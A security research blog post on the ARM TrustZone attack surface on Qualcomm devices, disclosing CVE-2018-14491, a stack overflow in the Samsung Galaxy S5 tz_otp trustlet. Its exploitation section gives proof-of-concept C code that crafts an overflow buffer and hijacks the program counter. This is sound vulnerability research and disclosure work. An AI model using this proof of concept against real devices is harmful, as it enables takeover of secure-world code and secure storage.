Attacking the ARM's TrustZone

Posted Tue 31 July 2018
Author Joffrey Guilbon
Category Reverse-Engineering
Tags TrustZone, ARM, reverse-engineering, 2018

An overview of the TrustZone was given in a previous article. This second article more technically addresses the attack surface and hotspots exposed to an attacker, as well as what can be done once code execution is achieved in the different privilege levels available in TrustZone.

TrustZone attack surface

Determining the target attack surface is always the first step in the vulnerability research process. The attack area of the TrustZone consists of three points:

The handler of messages addressed directly to the monitor.
Third-party applications (trustlets) running in TrustZone.
The Secure Boot component, which may allow code execution before the loading of the TrustZone and thus the ability to subvert the TrustZone itself.

This blogpost highlights vulnerabilities in the two first points presented above, as well as their implications and what can be done with them.

Following User Inputs

In order to carry out a vulnerability search, one must determine the attack surface offered to an attacker, i.e. what parameters can be used to influence the program. To do this, one has to follow the arguments passed from the Normal World to the Secure World, to determine how the functions available in the Secure World are invoked.

Browsing the open source communication driver

To figure out how arguments are passed from the Normal World to the Secure World, i.e. how one can pass arguments within an SMC (Secure Monitor Call), the Normal World open source driver can be browsed. As described in the driver source code, the functions executing the SMC instruction (named smc) are called by functions called scm_call (where scm stands for Secure Channel Manager). It is used when information needs to be passed from the Normal World to the Secure World, this operation is performed by filling in the following structures :

/**
 * struct scm_command - one SCM command buffer
 * @len: total available memory for command and response
 * @buf_offset: start of command buffer
 * @resp_hdr_offset: start of response buffer
 * @id: command to be executed
 * @buf: buffer returned from scm_get_command_buffer()
 *
 * An SCM command is laid out in memory as follows:
 *
 *        ------------------- <--- struct scm_command
 *        | command header  |
 *        ------------------- <--- scm_get_command_buffer()
 *        | command buffer  |
 *        ------------------- <--- struct scm_response and
 *        | response header |      scm_command_to_response()
 *        ------------------- <--- scm_get_response_buffer()
 *        | response buffer |
 *        -------------------
 *
 * There can be arbitrary padding between the headers and buffers so
 * you should always use the appropriate scm_get_*_buffer() routines
 * to access the buffers in a safe manner.
 */
struct scm_command {
        u32        len;
        u32        buf_offset;
        u32        resp_hdr_offset;
        u32        id;
        u32        buf[0];
};

And the answer from the TrustZone kernel is received thanks to the scm_response structure:

/**
 * struct scm_response - one SCM response buffer
 * @len: total available memory for response
 * @buf_offset: start of response data relative to start of scm_response
 * @is_complete: indicates if the command has finished processing
 */
struct scm_response {
        u32        len;
        u32        buf_offset;
        u32        is_complete;
};

The listing below shows the last function actually executing the SMC opcode:

static u32 smc(u32 cmd_addr)
{
        int context_id;
        register u32 r0 asm("r0") = 1;
        register u32 r1 asm("r1") = (u32)&context_id;
        register u32 r2 asm("r2") = cmd_addr;
        do {
                asm volatile(
                        __asmeq("%0", "r0")
                        __asmeq("%1", "r0")
                        __asmeq("%2", "r1")
                        __asmeq("%3", "r2")
#ifdef REQUIRES_SEC
                        ".arch_extension sec\n"
#endif
                        "smc        #0        @ switch to secure world\n"
                        : "=r" (r0)
                        : "r" (r0), "r" (r1), "r" (r2)
                        : "r3");
        } while (r0 == SCM_INTERRUPTED);
        return r0;
}

In this listing, r1 points to a kernel stack address, and r2 to the physical address of the allocated scm_command structure. r0 is set to 1, indicating that this scm is a normal one. However, for commands that require less data, or when no structure is required, another form of scm_call exists.

This other form of SCM is called scm_call_[1-4], where the number is the number of arguments passed to the monitor. These functions are used to issue an SMC with given arguments, service and command IDs. Service ID, Command ID and argument number are put together into r0 using the macro SCM_ATOMIC. As r0 is no longer equal to 1, it indicates to the TrustZone kernel that the following SCM is an atomic call with the argument number encoded in r0, and the arguments themselves are placed in r2 to r5.

s32 scm_call_atomic1(u32 svc, u32 cmd, u32 arg1)
{
        int context_id;
        register u32 r0 asm("r0") = SCM_ATOMIC(svc, cmd, 1);
        register u32 r1 asm("r1") = (u32)&context_id;
        register u32 r2 asm("r2") = arg1;
        asm volatile(
                __asmeq("%0", "r0")
                __asmeq("%1", "r0")
                __asmeq("%2", "r1")
                __asmeq("%3", "r2")
#ifdef REQUIRES_SEC
                        ".arch_extension sec\n"
#endif
                "smc        #0        @ switch to secure world\n"
                : "=r" (r0)
                : "r" (r0), "r" (r1), "r" (r2)
                : "r3");
        return r0;
}

First Attack Surface for an Attacker: Secure Monitor (Qualcomm based device)

Now that we have determined how the Normal World talks to the Secure World (thanks to the monitor, which acts as a bridge between worlds), we can search for a link between functions and their Service ID and Command ID.

In order to obtain the function requested by the Normal World, an array filled with structures is statically placed in the monitor. This static array corresponds to the attack surface available for an attacker. The format of the structures is as follows:

The concatenation of Service ID and Command ID;
A pointer to the string of the SCM function name;
An unknown integer;
Pointer to the handling function;
Arguments number;
Array filled by the size of each argument, one integer by argument.

Vulnerability in Qualcomm's Trusted Execution Environment implementation

This bug and the reverse of the message handling by the monitor were made by Gal Beniamini. This bug, reproduced on a Samsung S5, is interesting as it enables arbitrary code execution in the most privileged mode of the processor: the monitor mode (EL3).

Browsing through the list of all functions available through SCM, and analyzing them one by one has led to the discovery of a new vulnerability located in the tzbsp_es_is_activated function. This vulnerability allows to write a zero DWORD to an arbitrary address given by the attacker (in r0), including the TrustZone monitor and kernel.

Exploitation of this vulnerability is not explained in this blogpost, but if you are interested you can read the blogpost of Gal Beniamini where it is fully analyzed.

The vulnerability was fixed with the following patch

TrustZont monitor disassembly, patched version

Implications

This vulnerability allows an attacker to get arbitrary code execution at runtime in monitor (EL3). This could be used to backdoor the Normal World as well as the Secure World, but could also be used to instrument or put a debugger into the Secure World (at monitor or secure OS level) in order to find new vulnerabilities in the TrustZone OS (TEE-OS).

Vulnerability in Third-Party Application (CVE-2018-14491, Qualcomm based device)

Trustlets available for Qualcomm based devices can be retrieved under /system/vendor/firmware or /firmware/image and are split in different files, namely trustlet_name.b00, trustlet_name.b01... and trustlet_name.mdt. As written in the previous blogpost, Qualcomm's TrustZone implementation enables the operating system to load binaries in TrustZone to expand the features offered by the Secure Execution Environment. These binaries are called trustlet. The format of the trustlets available in the filesystem was completely reversed by Gal Beniamini, and a script was developed to recreate a valid ELF that can be loaded into IDA.

However, once reversing of the trustlets file format is done, questions remain:

How can the Normal World issue a request to the Secure World to request the loading of a trustlet?
How does the Normal World communicate with it at runtime?

Those tasks are carried out by the qseecom driver which provides an API to perform high-level tasks, relying on the primitives offered by the Secure Channel Manager (notably the scm_call function).

All functions necessary to load a trustlet are available through this kernel module, which in turn populates the right structure with the appropriate asked command ID to the requested functionality in Secure World. The Normal World can then load a trustlet with the qseecom_load_app function, and send data to it with __qseecom_send_cmd.

Once loaded into the Secure World, the kernel assigns an ID to the trustlet and calls its entry function. This entry function registers the trustlet to the TrustZone kernel and gives a handler routine which is triggered when the Normal World calls a trustlet's feature.

In the remaining part of this article we focus on the tz_otp version 1 trustlet, available on Samsung Galaxy S5 devices.

The handler function for the received messages offers different functions, and must always begin with the command otp_init to initialize the trustlet's internal state and not fall into trivial error case handling. Looking at the different functions available, we notice that they all are protected by a stack cookie except for one called otp_resync_account. By reading the first lines of assembly in this function, we notice a BLE instruction which is a signed comparison, (this corresponds to the comparison >384 in the hexrays view). That is a godsend because our input buffer cannot contain null bytes, so this implies an always positive output on this comparison for unsigned numbers. However, thanks to this signed comparison, we can pass in the buffer a negative value such as 0xFFFFFFFF, and follow the branch calling the function sub_68F8 (variable v3 is initialized to 0 at the beginning of the function).

This function is particularly interesting because it has a memcpy vulnerability with the length and src arguments controlled directly by the attacker from the Normal World supplied buffer, and we don't need any memory leak because there is no stack cookie for this function either!

Another lucky break was the memcpy() in this very same function, especially since the data copied and its length are controlled by the user. Yes, that means a stack overflow in a function with no cookie :-)

Implications

This vulnerability makes it possible to obtain an arbitrary code execution in EL0 Secure World (user Secure World). This is particularly interesting because it offers the opportunity to execute system calls to the TrustZone kernel, and thus access a new attack surface to elevate its privileges in the TrustZone kernel. In addition, it also offers access to the features of the TrustZone operating system such as the open and read system calls providing access to the secure-filesystem (SFS). Secure-filesystem is an encrypted file-system available for permanent storage. It's encrypted using a special hardware key available only from the Secure World context and then, ensuring the data's confidentiality from a potentially corrupted Normal World.

Reporting the vulnerability

The bug was reported to Samsung Mobile Security on July 3rd, 2018. Samsung confirmed that the bug exists on some regions or carriers with Qualcomm-based Samsung Galaxy S5 devices. The vulnerable component is obsolete and was disabled or removed in later models, while some regions or carriers have mitigated the bug. Nevertheless, Samsung said that they plan to patch the vulnerability in affected models.

Exploitation

In order to exploit this vulnerability, we need to get a way to interact with the kernel and ask it to load the trustlet into TrustZone. For convenience, we can adapt Gal Beniamini's work on Widevine to load and exploit the tz_otp trustlet. The reusable part here is the initialization of the handle of the application, it consists in opening the libQSEEComAPI.so shared library exposing the functions required to communicate with the kernel and to interact with the trustzone such as the QSEECom_start_app, QSEECom_stop_app and QSEECom_send_cmd functions.

libQSEEComAPI.so library allows us to use the following code to load tz_otp into trustzone:

int main() {

    //Getting the global handle used to interact with QSEECom
    struct qcom_wv_handle* handle = initialize_tzotp_handle();
    if (handle == NULL) {
        perror("[-] Failed to initialize tz_otp handle");
        return -errno;
    }

    //Loading the tz_otp application
    int res = (*handle->QSEECom_start_app)((struct QSEECom_handle **)&handle->qseecom,
                                            TZOTP_PATH, TZOTP_APP_NAME, TZOTP_BUFFER_SIZE);
    if (res < 0) {
        perror("[-] Failed to load tz_otp");
        return -errno;
    }
    printf("[+] tz_otp load res: %d\n", res);

The listing below allows to initialize tz_otp state, and trigger the vulnerability:

int otp_init(struct qcom_tzotp_handle* handle) {

    uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000);
    uint32_t cmd_resp_size = QSEECOM_ALIGN(8);
    uint32_t* cmd_req = malloc(cmd_req_size);
    uint32_t* cmd_resp = malloc(cmd_resp_size);

    memset(cmd_req, 0, cmd_req_size);
    memset(cmd_resp, 'B', cmd_resp_size);

    // OTP_INIT
    cmd_req[0] = OTP_INIT;
    cmd_req[1] = 0;
    cmd_req[2] = 0;
    cmd_req[3] = 0;
    cmd_req[4] = 0;
    cmd_req[5] = 0;

    int res = (*handle->QSEECom_set_bandwidth)(handle->qseecom, true);
    res = (*handle->QSEECom_send_cmd)(handle->qseecom,
                                            cmd_req,
                                        cmd_req_size,
                                        cmd_resp,
                                        cmd_resp_size);
    return 0;
}

int craft_buffer(uint32_t *cmd_req, int *index) {

    uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000);

    memset(cmd_req, 0, cmd_req_size);

    // OTP_RESYNC_TOKEN
    cmd_req[0] = OTP_RESYNC_TOKEN;
    int i;
    for (i = 1; i <= 0x551; i++){
            cmd_req[i] = 0x41414141;
    }

    cmd_req[i++] = JUNK;
    cmd_req[i++] = JUNK;
    cmd_req[i++] = JUNK;

    *index = i;

    // int overflow on the > 384
    cmd_req[286] = 0xFFFFFFFF;

    return 0;
}

int crash(struct qcom_tzotp_handle* handle) {

    uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000);
    uint32_t cmd_resp_size = QSEECOM_ALIGN(8);
    uint32_t* cmd_resp = malloc(cmd_resp_size);
    uint32_t* cmd_req = malloc(cmd_req_size);
    int i;

    otp_init(handle);

    memset(cmd_resp, 'B', cmd_resp_size);

    craft_buffer(cmd_req, &i);
    cmd_req[i++] = JUNK+1; // PC

    int res = (*handle->QSEECom_send_cmd)(handle->qseecom,
                                            cmd_req,
                                        cmd_req_size,
                                        cmd_resp,
                                        cmd_resp_size);
    return 0;
}

The result of the trustlet crash is available in the /sys/kernel/debug/tzdbg log file. It can be observed that the PC register contains the same value if two crashes are consecutive. This information allows us to get a leak of the trustlet memory mapping, and gives the ability to perform a rop-chain for the exploitation. It's also now possible to use any system call exposed by the trustzone kernel!

Concerns

Two things here seem surprising.

First, the application of stack cookies does not seem to be systematic. It is unclear why stack cookies are not applied to each function, one of our assumptions is that the developers must annotate a function to indicate to the compiler that it has to be protected by a stack cookie.

Secondly, although a form of ASLR is present, it seems that after a certain uptime of the phone, each trustlet is systematically loaded at the same address, reducing considerably the initial interest of the ASLR.

Conclusion

In this article we discussed the two attack surfaces offered to a user living in the Normal World, and detailed two vulnerabilities: - One vulnerability in the monitor, whose exploitation allows to obtain an arbitrary code execution in the most privileged exception level of the CPU. - Another one in a trustlet, to obtain an arbitrary code execution in user-mode (EL0) Secure World.

This last vulnerability can be used to audit the security of the Secure OS running in TrustZone, and enables a new attack surface to an attacker.

Acknowledgements

Jean-Baptiste Bédrune for the internship and his valuable tips,
Cédric Tessier for his advice,
Guillaume Delugré for his help,
Gal Beniamini for his answers to my emails,
Frederic Basse for his excellent work on nexus 5 monitor mode,
Alexandre Adamski for code proofreading and suggested improvements,
Quarkslab colleagues for proofreading this article and for their kindness.

If you would like to learn more about our security audits and explore how we can help you, get in touch with us!

Table of contents

TrustZone attack surface

Following User Inputs

Browsing the open source communication driver

First Attack Surface for an Attacker: Secure Monitor (Qualcomm based device)

Vulnerability in Qualcomm's Trusted Execution Environment implementation

Implications

Vulnerability in Third-Party Application (CVE-2018-14491, Qualcomm based device)

Implications

Reporting the vulnerability

Exploitation

Concerns

Conclusion

Acknowledgements